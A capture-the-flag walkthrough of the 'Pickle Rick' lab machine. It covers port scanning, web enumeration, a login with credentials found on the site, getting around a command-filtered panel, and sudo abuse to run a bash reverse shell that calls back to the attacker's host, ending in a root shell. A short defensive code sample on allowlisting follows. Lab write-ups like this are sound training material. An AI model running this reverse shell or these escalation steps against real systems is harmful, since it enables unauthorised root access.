Pickle Rick
Rick and Morty themed VM with a web server.
This room can be found HERE.
Nmap
First, we launch an nmap scan.
nmap -sV -sC -p- $IP --min-rate=5000
...
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ca:b4:fb:d9:51:93:12:59:8b:a8:6f:8a:80:47:57:77 (RSA)
| 256 b6:ac:c4:48:03:69:78:3b:c0:19:96:4f:11:6e:e6:88 (ECDSA)
|_ 256 e3:3b:1b:8e:a6:ac:f5:ac:19:cb:bc:e5:16:4f:82:07 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see that ports 22 & 80 are open, let's check out port 80 first.
Checking out the website

This seems to be the home page, let's check the source of the page. Sure enough, there is something interesting here, a username:

Enumeration
Since this is a web server, let's enumerate the pages on it. I'll use dirsearch for this, but gobuster can also be used.
dirsearch -u http://$IP
...
200 588B http://10.10.72.200/assets/
200 455B http://10.10.72.200/login.php
200 17B http://10.10.72.200/robots.txt
...
Login
It seems we have a login page, but let's check the robots.txt file. In this file we only have the text "Wubbalubbadubdub". Maybe this is the password for the login page. Let's check it out now.

Let's try the username we got on the home page and the "Wubbalubbadubdub" string we got on the robots.txt file.
Sure enough, we are in!

Trying out commands
It seems we have a command panel where we can input commands. Let's try a simple ls first.

It seems we have our first flag! Let's cat it so we get the content.

We can see that the cat command is disabled, but we can easily work around this by using another command, such as less. First down, two to go. 🚩
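From the defender's side, the cat/less behaviour above shows why filtering command names does not work. The following is an added example, not code from the room or the original write-up: it models the filter as a denylist (an assumption, since the panel's source is not shown) next to an allowlist design where the user picks a named action and never supplies a command string. The action names and the file name notes.txt are constructed for illustration.

```python
import re
import shlex
import subprocess
from typing import List, Optional

# Assumption: models the observed behaviour (cat refused, less accepted).
BLOCKED = {"cat"}

def denylist_permits(command: str) -> bool:
    """Weak check: refuse only when a blocked name appears as a word."""
    return not any(word in BLOCKED for word in shlex.split(command))

# Hardened design: fixed argv templates keyed by action name (hypothetical names).
ACTIONS = {
    "list": ["ls", "-1", "--"],  # takes exactly one relative path
    "uptime": ["uptime"],        # takes no argument
}
TAKES_PATH = {"list"}
SAFE_PATH = re.compile(r"[A-Za-z0-9_./-]{1,64}")

def build_argv(action: str, path: Optional[str] = None) -> List[str]:
    """Return the argv for an allowed action or raise ValueError."""
    if action not in ACTIONS:
        raise ValueError(f"unknown action: {action!r}")
    argv = list(ACTIONS[action])
    if action in TAKES_PATH:
        if (path is None or not SAFE_PATH.fullmatch(path)
                or path.startswith("/") or ".." in path.split("/")):
            raise ValueError("path rejected")
        argv.append(path)
    elif path is not None:
        raise ValueError("action takes no argument")
    return argv

def run_action(action: str, path: Optional[str] = None) -> str:
    """Run an allowed action without a shell and return its stdout."""
    result = subprocess.run(build_argv(action, path), shell=False,
                            capture_output=True, text=True,
                            timeout=5, check=False)
    return result.stdout

if __name__ == "__main__":
    print(denylist_permits("cat notes.txt"))   # refused by the denylist
    print(denylist_permits("less notes.txt"))  # accepted by the denylist
    print(build_argv("list", "assets"))
```

The allowlist only limits what the panel can ask for; the account the web server runs as still needs its sudo rights removed, since the sudo -l result later on this page is what turns the panel into root access.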
Let's try some other commands and see what we can do. First, let's find out who we are by running whoami.

Now let's see if we can do anything as sudo by running sudo -l.

Reverse shell
Okay! We can pretty much do anything, which means we can launch a reverse shell as root! Let's create the reverse shell script and add execution privileges first (Reverse Shell Cheat Sheet). I'll type these commands into the command panel:
sudo echo "bash -i >& /dev/tcp/10.8.239.221/4444 0>&1" | sudo tee hello.sh
sudo chmod +x hello.sh
On my Kali machine, I'll launch ncat with nc -nlvp 4444. Then we can initiate the shell by typing sudo bash hello.sh into the command panel.
listening on [any] 4444 ...
connect to [10.8.239.221] from (UNKNOWN) [10.10.72.200] 57232
bash: cannot set terminal process group (1347): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10-10-72-200:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
And so we have a root shell!
Finding the remaining flags
Now let's search for the remaining flags. Let's check the /home directory first.
root@ip-10-10-72-200:/home# ls
rick
ubuntu
We can check Rick's home folder if there is anything interesting.
root@ip-10-10-72-200:/home# ls rick
second ingredients
Second flag done! 🚩
Something tells me the third flag is in the /root directory, so let's check it out.
root@ip-10-10-72-200:/home# cd /root
root@ip-10-10-72-200:~# ls
3rd.txt
snap
And there we go! We have all the flags 🚩